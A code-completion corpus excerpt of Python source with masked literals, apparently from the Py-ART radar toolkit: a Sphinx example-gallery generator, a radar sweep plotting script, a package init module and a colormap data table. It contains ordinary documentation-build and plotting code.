find ( '<STR_LIT:U+002C>' , pos_tmp ) <EOL> if pos_last < <NUM_LIT:0> : <EOL> break <EOL> pos_last += <NUM_LIT:1> <EOL> pos = dict_str . find ( '<STR_LIT::>' , pos_last ) <EOL> return dict_out <EOL> query = '<STR_LIT>' <EOL> pos = searchindex . find ( query ) <EOL> if pos < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> sel = _select_block ( searchindex [ pos : ] , '<STR_LIT:{>' , '<STR_LIT:}>' ) <EOL> objects = _parse_dict_recursive ( sel ) <EOL> query = '<STR_LIT>' <EOL> pos = searchindex . find ( query ) <EOL> if pos < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> filenames = searchindex [ pos + len ( query ) + <NUM_LIT:1> : ] <EOL> filenames = filenames [ : filenames . find ( '<STR_LIT:]>' ) ] <EOL> filenames = [ f . strip ( '<STR_LIT:">' ) for f in filenames . split ( '<STR_LIT:U+002C>' ) ] <EOL> return filenames , objects <EOL> class SphinxDocLinkResolver ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , doc_url , searchindex = '<STR_LIT>' , <EOL> extra_modules_test = None , relative = False ) : <EOL> self . doc_url = doc_url <EOL> self . relative = relative <EOL> self . _link_cache = { } <EOL> self . extra_modules_test = extra_modules_test <EOL> self . _page_cache = { } <EOL> if doc_url . startswith ( '<STR_LIT>' ) : <EOL> if relative : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> searchindex_url = doc_url + '<STR_LIT:/>' + searchindex <EOL> else : <EOL> searchindex_url = os . path . join ( doc_url , searchindex ) <EOL> if os . name . lower ( ) == '<STR_LIT>' and not doc_url . startswith ( '<STR_LIT>' ) : <EOL> if not relative : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _is_windows = True <EOL> else : <EOL> self . _is_windows = False <EOL> sindex = get_data ( searchindex_url ) <EOL> filenames , objects = parse_sphinx_searchindex ( sindex ) <EOL> self . 
_searchindex = dict ( filenames = filenames , objects = objects ) <EOL> def _get_link ( self , cobj ) : <EOL> """<STR_LIT>""" <EOL> fname_idx = None <EOL> full_name = cobj [ '<STR_LIT>' ] + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] <EOL> if full_name in self . _searchindex [ '<STR_LIT>' ] : <EOL> value = self . _searchindex [ '<STR_LIT>' ] [ full_name ] <EOL> if isinstance ( value , dict ) : <EOL> value = value [ value . keys ( ) [ <NUM_LIT:0> ] ] <EOL> fname_idx = value [ <NUM_LIT:0> ] <EOL> elif cobj [ '<STR_LIT>' ] in self . _searchindex [ '<STR_LIT>' ] : <EOL> value = self . _searchindex [ '<STR_LIT>' ] [ cobj [ '<STR_LIT>' ] ] <EOL> if cobj [ '<STR_LIT:name>' ] in value . keys ( ) : <EOL> fname_idx = value [ cobj [ '<STR_LIT:name>' ] ] [ <NUM_LIT:0> ] <EOL> if fname_idx is not None : <EOL> fname = self . _searchindex [ '<STR_LIT>' ] [ fname_idx ] + '<STR_LIT>' <EOL> if self . _is_windows : <EOL> fname = fname . replace ( '<STR_LIT:/>' , '<STR_LIT:\\>' ) <EOL> link = os . path . join ( self . doc_url , fname ) <EOL> else : <EOL> link = posixpath . join ( self . doc_url , fname ) <EOL> if link in self . _page_cache : <EOL> html = self . _page_cache [ link ] <EOL> else : <EOL> html = get_data ( link ) <EOL> self . _page_cache [ link ] = html <EOL> comb_names = [ cobj [ '<STR_LIT>' ] + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] ] <EOL> if self . extra_modules_test is not None : <EOL> for mod in self . extra_modules_test : <EOL> comb_names . append ( mod + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] ) <EOL> url = False <EOL> for comb_name in comb_names : <EOL> if html . find ( comb_name ) >= <NUM_LIT:0> : <EOL> url = link + '<STR_LIT:#>' + comb_name <EOL> link = url <EOL> else : <EOL> link = False <EOL> return link <EOL> def resolve ( self , cobj , this_url ) : <EOL> """<STR_LIT>""" <EOL> full_name = cobj [ '<STR_LIT>' ] + '<STR_LIT:.>' + cobj [ '<STR_LIT:name>' ] <EOL> link = self . _link_cache . get ( full_name , None ) <EOL> if link is None : <EOL> link = self . 
_get_link ( cobj ) <EOL> self . _link_cache [ full_name ] = link <EOL> if link is False or link is None : <EOL> return None <EOL> if self . relative : <EOL> link = os . path . relpath ( link , start = this_url ) <EOL> if self . _is_windows : <EOL> link = link . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> link = link [ <NUM_LIT:3> : ] <EOL> return link <EOL> rst_template = """<STR_LIT>""" <EOL> plot_rst_template = """<STR_LIT>""" <EOL> HLIST_HEADER = """<STR_LIT>""" <EOL> HLIST_IMAGE_TEMPLATE = """<STR_LIT>""" <EOL> SINGLE_IMAGE = """<STR_LIT>""" <EOL> def extract_docstring ( filename , ignore_heading = False ) : <EOL> """<STR_LIT>""" <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> lines = open ( filename , encoding = '<STR_LIT:utf-8>' ) . readlines ( ) <EOL> else : <EOL> lines = open ( filename ) . readlines ( ) <EOL> start_row = <NUM_LIT:0> <EOL> if lines [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> lines . pop ( <NUM_LIT:0> ) <EOL> start_row = <NUM_LIT:1> <EOL> docstring = '<STR_LIT>' <EOL> first_par = '<STR_LIT>' <EOL> line_iterator = iter ( lines ) <EOL> tokens = tokenize . generate_tokens ( lambda : next ( line_iterator ) ) <EOL> for tok_type , tok_content , _ , ( erow , _ ) , _ in tokens : <EOL> tok_type = token . tok_name [ tok_type ] <EOL> if tok_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> elif tok_type == '<STR_LIT>' : <EOL> docstring = eval ( tok_content ) <EOL> paragraphs = '<STR_LIT:\n>' . join ( <EOL> line . rstrip ( ) for line <EOL> in docstring . split ( '<STR_LIT:\n>' ) ) . split ( '<STR_LIT>' ) <EOL> if paragraphs : <EOL> if ignore_heading : <EOL> if len ( paragraphs ) > <NUM_LIT:1> : <EOL> first_par = re . 
sub ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' , paragraphs [ <NUM_LIT:1> ] ) <EOL> first_par = ( ( first_par [ : <NUM_LIT> ] + '<STR_LIT>' ) <EOL> if len ( first_par ) > <NUM_LIT> else first_par ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> first_par = paragraphs [ <NUM_LIT:0> ] <EOL> break <EOL> return docstring , first_par , erow + <NUM_LIT:1> + start_row <EOL> def generate_example_rst ( app ) : <EOL> """<STR_LIT>""" <EOL> root_dir = os . path . join ( app . builder . srcdir , '<STR_LIT>' ) <EOL> example_dir = os . path . abspath ( app . builder . srcdir + '<STR_LIT>' + '<STR_LIT>' ) <EOL> try : <EOL> plot_gallery = eval ( app . builder . config . plot_gallery ) <EOL> except TypeError : <EOL> plot_gallery = bool ( app . builder . config . plot_gallery ) <EOL> if not os . path . exists ( example_dir ) : <EOL> os . makedirs ( example_dir ) <EOL> if not os . path . exists ( root_dir ) : <EOL> os . makedirs ( root_dir ) <EOL> fhindex = open ( os . path . join ( root_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> fhindex . write ( """<STR_LIT>""" ) <EOL> generate_dir_rst ( '<STR_LIT:.>' , fhindex , example_dir , root_dir , plot_gallery ) <EOL> for dir in sorted ( os . listdir ( example_dir ) ) : <EOL> if os . path . isdir ( os . path . join ( example_dir , dir ) ) : <EOL> generate_dir_rst ( dir , fhindex , example_dir , root_dir , plot_gallery ) <EOL> fhindex . flush ( ) <EOL> def extract_line_count ( filename , target_dir ) : <EOL> example_file = os . path . join ( target_dir , filename ) <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> lines = open ( example_file , encoding = '<STR_LIT:utf-8>' ) . readlines ( ) <EOL> else : <EOL> lines = open ( example_file ) . readlines ( ) <EOL> start_row = <NUM_LIT:0> <EOL> if lines and lines [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> lines . 
pop ( <NUM_LIT:0> ) <EOL> start_row = <NUM_LIT:1> <EOL> line_iterator = iter ( lines ) <EOL> tokens = tokenize . generate_tokens ( lambda : next ( line_iterator ) ) <EOL> check_docstring = True <EOL> erow_docstring = <NUM_LIT:0> <EOL> for tok_type , _ , _ , ( erow , _ ) , _ in tokens : <EOL> tok_type = token . tok_name [ tok_type ] <EOL> if tok_type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> elif ( ( tok_type == '<STR_LIT>' ) and check_docstring ) : <EOL> erow_docstring = erow <EOL> check_docstring = False <EOL> return erow_docstring + <NUM_LIT:1> + start_row , erow + <NUM_LIT:1> + start_row <EOL> def line_count_sort ( file_list , target_dir ) : <EOL> new_list = [ x for x in file_list if x . endswith ( '<STR_LIT>' ) ] <EOL> unsorted = np . zeros ( shape = ( len ( new_list ) , <NUM_LIT:2> ) ) <EOL> unsorted = unsorted . astype ( np . object ) <EOL> for count , exmpl in enumerate ( new_list ) : <EOL> docstr_lines , total_lines = extract_line_count ( exmpl , target_dir ) <EOL> unsorted [ count ] [ <NUM_LIT:1> ] = total_lines - docstr_lines <EOL> unsorted [ count ] [ <NUM_LIT:0> ] = exmpl <EOL> index = np . lexsort ( ( unsorted [ : , <NUM_LIT:0> ] . astype ( np . str ) , <EOL> unsorted [ : , <NUM_LIT:1> ] . astype ( np . float ) ) ) <EOL> if not len ( unsorted ) : <EOL> return [ ] <EOL> return np . array ( unsorted [ index ] [ : , <NUM_LIT:0> ] ) . tolist ( ) <EOL> def generate_dir_rst ( dir , fhindex , example_dir , root_dir , plot_gallery ) : <EOL> """<STR_LIT>""" <EOL> if not dir == '<STR_LIT:.>' : <EOL> target_dir = os . path . join ( root_dir , dir ) <EOL> src_dir = os . path . join ( example_dir , dir ) <EOL> else : <EOL> target_dir = root_dir <EOL> src_dir = example_dir <EOL> if not os . path . exists ( os . path . 
join ( src_dir , '<STR_LIT>' ) ) : <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> print ( '<STR_LIT>' % <EOL> src_dir ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> return <EOL> fhindex . write ( """<STR_LIT>""" % open ( os . path . join ( src_dir , '<STR_LIT>' ) ) . read ( ) ) <EOL> if not os . path . exists ( target_dir ) : <EOL> os . makedirs ( target_dir ) <EOL> sorted_listdir = line_count_sort ( os . listdir ( src_dir ) , <EOL> src_dir ) <EOL> for fname in sorted_listdir : <EOL> if fname . endswith ( '<STR_LIT>' ) : <EOL> generate_file_rst ( fname , target_dir , src_dir , plot_gallery ) <EOL> new_fname = os . path . join ( src_dir , fname ) <EOL> _ , fdocstring , _ = extract_docstring ( new_fname , True ) <EOL> thumb = os . path . join ( dir , '<STR_LIT>' , '<STR_LIT>' , fname [ : - <NUM_LIT:3> ] + '<STR_LIT>' ) <EOL> link_name = os . path . join ( dir , fname ) . replace ( os . path . sep , '<STR_LIT:_>' ) <EOL> fhindex . write ( """<STR_LIT>""" ) <EOL> fhindex . write ( '<STR_LIT>' % thumb ) <EOL> if link_name . startswith ( '<STR_LIT>' ) : <EOL> link_name = link_name [ <NUM_LIT:2> : ] <EOL> if dir != '<STR_LIT:.>' : <EOL> fhindex . write ( '<STR_LIT>' % ( dir , <EOL> fname [ : - <NUM_LIT:3> ] ) ) <EOL> else : <EOL> fhindex . write ( '<STR_LIT>' % link_name [ : - <NUM_LIT:3> ] ) <EOL> fhindex . write ( """<STR_LIT>""" % ( link_name , fdocstring , dir , fname [ : - <NUM_LIT:3> ] ) ) <EOL> fhindex . write ( """<STR_LIT>""" ) <EOL> DOCMODULES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def make_thumbnail ( in_fname , out_fname , width , height ) : <EOL> """<STR_LIT>""" <EOL> img = Image . open ( in_fname ) <EOL> width_in , height_in = img . 
size <EOL> scale_w = width / float ( width_in ) <EOL> scale_h = height / float ( height_in ) <EOL> if height_in * scale_w <= height : <EOL> scale = scale_w <EOL> else : <EOL> scale = scale_h <EOL> width_sc = int ( round ( scale * width_in ) ) <EOL> height_sc = int ( round ( scale * height_in ) ) <EOL> img . thumbnail ( ( width_sc , height_sc ) , Image . ANTIALIAS ) <EOL> thumb = Image . new ( '<STR_LIT>' , ( width , height ) , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) ) <EOL> pos_insert = ( ( width - width_sc ) // <NUM_LIT:2> , ( height - height_sc ) // <NUM_LIT:2> ) <EOL> thumb . paste ( img , pos_insert ) <EOL> thumb . save ( out_fname ) <EOL> def get_short_module_name ( module_name , obj_name ) : <EOL> """<STR_LIT>""" <EOL> parts = module_name . split ( '<STR_LIT:.>' ) <EOL> short_name = module_name <EOL> for i in range ( len ( parts ) - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> short_name = '<STR_LIT:.>' . join ( parts [ : i ] ) <EOL> try : <EOL> exec ( '<STR_LIT>' % ( short_name , obj_name ) ) <EOL> except ImportError : <EOL> short_name = '<STR_LIT:.>' . join ( parts [ : ( i + <NUM_LIT:1> ) ] ) <EOL> break <EOL> return short_name <EOL> def generate_file_rst ( fname , target_dir , src_dir , plot_gallery ) : <EOL> """<STR_LIT>""" <EOL> base_image_name = os . path . splitext ( fname ) [ <NUM_LIT:0> ] <EOL> image_fname = '<STR_LIT>' % base_image_name <EOL> this_template = rst_template <EOL> last_dir = os . path . split ( src_dir ) [ - <NUM_LIT:1> ] <EOL> if last_dir == '<STR_LIT:.>' or last_dir == '<STR_LIT>' : <EOL> last_dir = '<STR_LIT>' <EOL> else : <EOL> last_dir += '<STR_LIT:_>' <EOL> short_fname = last_dir + fname <EOL> src_file = os . path . join ( src_dir , fname ) <EOL> example_file = os . path . join ( target_dir , fname ) <EOL> shutil . copyfile ( src_file , example_file ) <EOL> figure_list = [ ] <EOL> image_dir = os . path . join ( target_dir , '<STR_LIT>' ) <EOL> thumb_dir = os . path . 
join ( image_dir , '<STR_LIT>' ) <EOL> if not os . path . exists ( image_dir ) : <EOL> os . makedirs ( image_dir ) <EOL> if not os . path . exists ( thumb_dir ) : <EOL> os . makedirs ( thumb_dir ) <EOL> image_path = os . path . join ( image_dir , image_fname ) <EOL> stdout_path = os . path . join ( image_dir , <EOL> '<STR_LIT>' % base_image_name ) <EOL> time_path = os . path . join ( image_dir , <EOL> '<STR_LIT>' % base_image_name ) <EOL> thumb_file = os . path . join ( thumb_dir , fname [ : - <NUM_LIT:3> ] + '<STR_LIT>' ) <EOL> time_elapsed = <NUM_LIT:0> <EOL> if plot_gallery and fname . startswith ( '<STR_LIT>' ) : <EOL> first_image_file = image_path % <NUM_LIT:1> <EOL> if os . path . exists ( stdout_path ) : <EOL> stdout = open ( stdout_path ) . read ( ) <EOL> else : <EOL> stdout = '<STR_LIT>' <EOL> if os . path . exists ( time_path ) : <EOL> time_elapsed = float ( open ( time_path ) . read ( ) ) <EOL> if not os . path . exists ( first_image_file ) or os . stat ( first_image_file ) . st_mtime <= os . stat ( src_file ) . st_mtime : <EOL> print ( '<STR_LIT>' % fname ) <EOL> t0 = time ( ) <EOL> import matplotlib . pyplot as plt <EOL> plt . close ( '<STR_LIT:all>' ) <EOL> cwd = os . getcwd ( ) <EOL> try : <EOL> orig_stdout = sys . stdout <EOL> os . chdir ( os . path . dirname ( src_file ) ) <EOL> my_buffer = StringIO ( ) <EOL> my_stdout = Tee ( sys . stdout , my_buffer ) <EOL> sys . stdout = my_stdout <EOL> my_globals = { '<STR_LIT>' : plt } <EOL> execfile ( os . path . basename ( src_file ) , my_globals ) <EOL> time_elapsed = time ( ) - t0 <EOL> sys . stdout = orig_stdout <EOL> my_stdout = my_buffer . getvalue ( ) <EOL> example_code_obj = { } <EOL> for var_name , var in my_globals . items ( ) : <EOL> if not hasattr ( var , '<STR_LIT>' ) : <EOL> continue <EOL> if not isinstance ( var . __module__ , basestring ) : <EOL> continue <EOL> if var . __module__ . 
split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] not in DOCMODULES : <EOL> continue <EOL> tstr = str ( type ( var ) ) <EOL> tstr = ( tstr [ tstr . find ( '<STR_LIT>' ) <EOL> + <NUM_LIT:1> : tstr . rfind ( '<STR_LIT>' ) ] . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ) <EOL> module_short = get_short_module_name ( var . __module__ , <EOL> tstr ) <EOL> cobj = { '<STR_LIT:name>' : tstr , '<STR_LIT>' : var . __module__ , <EOL> '<STR_LIT>' : module_short , <EOL> '<STR_LIT>' : '<STR_LIT:object>' } <EOL> example_code_obj [ var_name ] = cobj <EOL> funregex = re . compile ( '<STR_LIT>' ) <EOL> with open ( src_file , '<STR_LIT>' ) as fid : <EOL> for line in fid . readlines ( ) : <EOL> if line . startswith ( '<STR_LIT:#>' ) : <EOL> continue <EOL> for match in funregex . findall ( line ) : <EOL> fun_name = match [ : - <NUM_LIT:1> ] <EOL> try : <EOL> exec ( '<STR_LIT>' % fun_name , my_globals ) <EOL> except Exception as err : <EOL> continue <EOL> this_fun = my_globals [ '<STR_LIT>' ] <EOL> if not callable ( this_fun ) : <EOL> continue <EOL> if not hasattr ( this_fun , '<STR_LIT>' ) : <EOL> continue <EOL> if not isinstance ( this_fun . __module__ , basestring ) : <EOL> continue <EOL> if ( this_fun . __module__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> not in DOCMODULES ) : <EOL> continue <EOL> fun_name_short = fun_name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> module_short = get_short_module_name ( <EOL> this_fun . __module__ , fun_name_short ) <EOL> cobj = { '<STR_LIT:name>' : fun_name_short , <EOL> '<STR_LIT>' : this_fun . __module__ , <EOL> '<STR_LIT>' : module_short , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> example_code_obj [ fun_name ] = cobj <EOL> fid . close ( ) <EOL> if len ( example_code_obj ) > <NUM_LIT:0> : <EOL> codeobj_fname = example_file [ : - <NUM_LIT:3> ] + '<STR_LIT>' <EOL> with open ( codeobj_fname , '<STR_LIT:wb>' ) as fid : <EOL> pickle . dump ( example_code_obj , fid , <EOL> pickle . HIGHEST_PROTOCOL ) <EOL> fid . 
close ( ) <EOL> if '<STR_LIT>' in my_globals : <EOL> my_stdout = my_stdout . replace ( <EOL> my_globals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' ) <EOL> my_stdout = my_stdout . strip ( ) <EOL> if my_stdout : <EOL> stdout = '<STR_LIT>' % ( <EOL> '<STR_LIT>' . join ( my_stdout . split ( '<STR_LIT:\n>' ) ) ) <EOL> open ( stdout_path , '<STR_LIT:w>' ) . write ( stdout ) <EOL> open ( time_path , '<STR_LIT:w>' ) . write ( '<STR_LIT>' % time_elapsed ) <EOL> os . chdir ( cwd ) <EOL> for fig_num in ( fig_mngr . num for fig_mngr in <EOL> matplotlib . _pylab_helpers . Gcf . get_all_fig_managers ( ) ) : <EOL> plt . figure ( fig_num ) <EOL> plt . savefig ( image_path % fig_num ) <EOL> figure_list . append ( image_fname % fig_num ) <EOL> except : <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> print ( '<STR_LIT>' % fname ) <EOL> traceback . print_exc ( ) <EOL> print ( <NUM_LIT> * '<STR_LIT:_>' ) <EOL> finally : <EOL> os . chdir ( cwd ) <EOL> sys . stdout = orig_stdout <EOL> print ( "<STR_LIT>" % time_elapsed ) <EOL> else : <EOL> figure_list = [ f [ len ( image_dir ) : ] <EOL> for f in glob . glob ( image_path % '<STR_LIT>' ) ] <EOL> this_template = plot_rst_template <EOL> if os . path . exists ( first_image_file ) : <EOL> make_thumbnail ( first_image_file , thumb_file , <NUM_LIT> , <NUM_LIT> ) <EOL> if not os . path . exists ( thumb_file ) : <EOL> make_thumbnail ( '<STR_LIT>' , thumb_file , <NUM_LIT:200> , <NUM_LIT> ) <EOL> docstring , short_desc , end_row = extract_docstring ( example_file ) <EOL> if len ( figure_list ) == <NUM_LIT:1> : <EOL> figure_name = figure_list [ <NUM_LIT:0> ] <EOL> image_list = SINGLE_IMAGE % figure_name . lstrip ( '<STR_LIT:/>' ) <EOL> else : <EOL> image_list = HLIST_HEADER <EOL> for figure_name in figure_list : <EOL> image_list += HLIST_IMAGE_TEMPLATE % figure_name . lstrip ( '<STR_LIT:/>' ) <EOL> f = open ( os . path . join ( target_dir , fname [ : - <NUM_LIT:2> ] + '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> f . write ( this_template % locals ( ) ) <EOL> f . 
flush ( ) <EOL> def embed_code_links ( app , exception ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if exception is not None : <EOL> return <EOL> print ( '<STR_LIT>' ) <EOL> doc_resolvers = { } <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( app . builder . outdir , <EOL> relative = True ) <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( <EOL> '<STR_LIT>' ) <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( <EOL> '<STR_LIT>' ) <EOL> doc_resolvers [ '<STR_LIT>' ] = SphinxDocLinkResolver ( <EOL> '<STR_LIT>' ) <EOL> example_dir = os . path . join ( app . builder . srcdir , '<STR_LIT>' ) <EOL> html_example_dir = os . path . abspath ( os . path . join ( app . builder . outdir , <EOL> '<STR_LIT>' ) ) <EOL> link_pattern = '<STR_LIT>' <EOL> orig_pattern = '<STR_LIT>' <EOL> period = '<STR_LIT>' <EOL> for dirpath , _ , filenames in os . walk ( html_example_dir ) : <EOL> for fname in filenames : <EOL> print ( '<STR_LIT>' % fname ) <EOL> full_fname = os . path . join ( html_example_dir , dirpath , fname ) <EOL> subpath = dirpath [ len ( html_example_dir ) + <NUM_LIT:1> : ] <EOL> pickle_fname = os . path . join ( example_dir , subpath , <EOL> fname [ : - <NUM_LIT:5> ] + '<STR_LIT>' ) <EOL> if os . path . exists ( pickle_fname ) : <EOL> with open ( pickle_fname , '<STR_LIT:rb>' ) as fid : <EOL> example_code_obj = pickle . load ( fid ) <EOL> fid . close ( ) <EOL> str_repl = { } <EOL> for name , cobj in example_code_obj . iteritems ( ) : <EOL> this_module = cobj [ '<STR_LIT>' ] . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> if this_module not in doc_resolvers : <EOL> continue <EOL> link = doc_resolvers [ this_module ] . resolve ( cobj , <EOL> full_fname ) <EOL> if link is not None : <EOL> parts = name . 
split ( '<STR_LIT:.>' ) <EOL> name_html = orig_pattern % parts [ <NUM_LIT:0> ] <EOL> for part in parts [ <NUM_LIT:1> : ] : <EOL> name_html += period + orig_pattern % part <EOL> str_repl [ name_html ] = link_pattern % ( link , name_html ) <EOL> if len ( str_repl ) > <NUM_LIT:0> : <EOL> with open ( full_fname , '<STR_LIT:rb>' ) as fid : <EOL> lines_in = fid . readlines ( ) <EOL> with open ( full_fname , '<STR_LIT:wb>' ) as fid : <EOL> for line in lines_in : <EOL> line = line . decode ( '<STR_LIT:utf-8>' ) <EOL> for name , link in str_repl . iteritems ( ) : <EOL> line = line . replace ( name , link ) <EOL> fid . write ( line . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except HTTPError as e : <EOL> print ( "<STR_LIT>" ) <EOL> print ( e . code ) <EOL> except URLError as e : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> print ( e . args ) <EOL> print ( '<STR_LIT>' ) <EOL> def setup ( app ) : <EOL> app . connect ( '<STR_LIT>' , generate_example_rst ) <EOL> app . add_config_value ( '<STR_LIT>' , True , '<STR_LIT:html>' ) <EOL> build_image_dir = '<STR_LIT>' <EOL> if os . path . exists ( build_image_dir ) : <EOL> filelist = os . listdir ( build_image_dir ) <EOL> for filename in filelist : <EOL> if filename . endswith ( '<STR_LIT>' ) : <EOL> os . remove ( os . path . join ( build_image_dir , filename ) ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import netCDF4 <EOL> import matplotlib . pyplot as plt <EOL> import pyart <EOL> filename = '<STR_LIT>' <EOL> radar = pyart . io . read_cfradial ( filename ) <EOL> radar . metadata [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> display = pyart . graph . RadarDisplay ( radar ) <EOL> fig = plt . figure ( figsize = [ <NUM_LIT:12> , <NUM_LIT> ] ) <EOL> fig . subplots_adjust ( hspace = <NUM_LIT> ) <EOL> xlabel = '<STR_LIT>' <EOL> ylabel = '<STR_LIT>' <EOL> colorbar_label = '<STR_LIT>' <EOL> nplots = radar . nsweeps <EOL> for snum in radar . sweep_number [ '<STR_LIT:data>' ] : <EOL> fixed_angle = radar . fixed_angle [ '<STR_LIT:data>' ] [ snum ] <EOL> title = '<STR_LIT>' % ( fixed_angle ) <EOL> ax = fig . add_subplot ( nplots , <NUM_LIT:1> , snum + <NUM_LIT:1> ) <EOL> display . plot ( '<STR_LIT>' , snum , vmin = - <NUM_LIT:20> , vmax = <NUM_LIT:20> , <EOL> mask_outside = False , title = title , <EOL> axislabels = ( xlabel , ylabel ) , <EOL> colorbar_label = colorbar_label , ax = ax ) <EOL> display . set_limits ( ylim = [ <NUM_LIT:0> , <NUM_LIT:15> ] , ax = ax ) <EOL> time_start = netCDF4 . num2date ( radar . time [ '<STR_LIT:data>' ] [ <NUM_LIT:0> ] , radar . time [ '<STR_LIT>' ] ) <EOL> figure_title = '<STR_LIT>' + time_start . isoformat ( ) + '<STR_LIT>' <EOL> fig . text ( <NUM_LIT> , <NUM_LIT> , figure_title ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from . radar import Radar <EOL> from . grid import Grid <EOL> from . transforms import antenna_to_cartesian <EOL> from . transforms import antenna_vectors_to_cartesian <EOL> from . transforms import cartesian_to_geographic <EOL> from . transforms import cartesian_vectors_to_geographic <EOL> from . transforms import cartesian_to_geographic_aeqd <EOL> from . transforms import geographic_to_cartesian <EOL> from . transforms import geographic_to_cartesian_aeqd <EOL> from . . exceptions import _deprecated_alias <EOL> from . . util import radar_utils as _radar_utils <EOL> is_vpt = _deprecated_alias ( <EOL> _radar_utils . is_vpt , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> to_vpt = _deprecated_alias ( <EOL> _radar_utils . to_vpt , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> __all__ = [ s for s in dir ( ) if not s . startswith ( '<STR_LIT:_>' ) ] </s>
<s> """<STR_LIT>""" <EOL> _NWSRef_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , 